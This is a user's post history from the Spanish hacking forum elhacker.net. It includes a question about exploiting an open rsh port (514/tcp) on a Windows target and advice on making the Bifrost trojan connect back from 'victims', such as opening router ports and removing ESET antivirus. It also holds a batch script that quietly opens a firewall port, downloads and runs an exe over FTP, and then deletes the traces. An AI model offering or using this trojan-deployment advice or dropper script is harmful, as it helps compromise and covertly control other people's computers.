elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 [2]
11  Seguridad Informática / Hacking / Re: Puerto 514/tcp shell en: 2 Marzo 2010, 22:56 pm
Quiero decir q no explota el puerto, me imagino q estara actualizado.
12  Seguridad Informática / Hacking / Re: Puerto 514/tcp shell en: 2 Marzo 2010, 15:15 pm
Nmap dice q el estado es Open.
13  Seguridad Informática / Hacking / Puerto 514/tcp shell en: 2 Marzo 2010, 14:55 pm
Hola, alguno sabe como establecer una conexion con ese puerto??
Al parecer corre en un sistema windows. He probado con netcat y telnet y no establece conexión.

Google dice:
 
514 shell Comando remoto, sin password!

Existe un exploit:

http://www.exploit-db.com/exploits/4222

pero no me sirve, alguna idea??
14  Seguridad Informática / Hacking / Re: Bifrost no funciona con victimas !! en: 20 Enero 2010, 23:57 pm
netstat= inicio + ejecutar + cmd ---> (en la consola) escribe netstat, y te apareceran las conexiones de red. Procura tener el navegador cerrado y ni emule ni nada q conecte a internet y lo veras mas claro. Ejecuta el troyano y vuelves a escribir netstat. Si aparece una conexion saliente es q ya esta funcionando, y el problema lo tendrias q algo bloquea esa conexion. Si es asi te recomiendo desinstalar ESET y probar xra quitarnos de dudas.
15  Seguridad Informática / Hacking / Re: Bifrost no funciona con victimas !! en: 20 Enero 2010, 00:11 am
Lo primero configuralo con puertos mas altos 2000, 2020, 2222... Abre esos puertos al router(TCD, UPD) y en el firwall abre también esos puertos. Alguna vez me pasa q con ESET no establece conexión, aunq este desactivado. Prueba despues de ejecutar el troyano a hacer un Netstat para ver si manda el syn-sent.

P.D. Bifrost si funciona con Windows Vista... creo  :P
16  Seguridad Informática / Hacking / Re: Algun libro para empezar de 0 que sea completo? en: 29 Diciembre 2009, 02:25 am
La Biblia del Hacker, edicion 2009. Ningun libro q vayas a encontrar va a ser completo, debido a q este mundo es inmenso; pero con este libro mas q suficiente xra empezar a hacerte una idea d q va el tema.  :)
17  Programación / Scripting / Pregunta sobre script (descarga de archivo en ftp) en: 23 Noviembre 2009, 17:22 pm
Hola, soy nuevo en esto del batch. Estoy creando un script para q se descarge un archivo a traves de ftp. El script es este:
@echo off
netsh firewall add portopening all puerto nombre>nul
echo open > "c:\ftptexto.txt"
echo direccion ip >> "c:\ftptexto.txt"
echo usuario>> "c:\ftptexto.txt"
echo contraseña>> "c:\ftptexto.txt"
echo lcd "c:\" >> "c:\ftptexto.txt"
echo get archivo.exe >> "c:\ftptexto.txt"
echo close >> "c:\ftptexto.txt"
echo bye >> "c:\ftptexto.txt"
ftp -s:c:\ftptexto.txt>nul
cd "c:\"
archivo.exe
ping localhost -n 10>nul
del /f /q "c:\archivo.exe">nul
del /f /q "c:\ftptexto.txt">nul
exit
Funciona perfectamente, el problema es q cuando no esta disponible el servidor salta un error, hasta ahi bien, pero me crea el ftptexto.txt y el archivo.exe y no me los borra. ¿Que deberia hacer para q me los borrase cuando el servidor estubiera desconectado?
Un saludo a todos y gracias!!!!
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines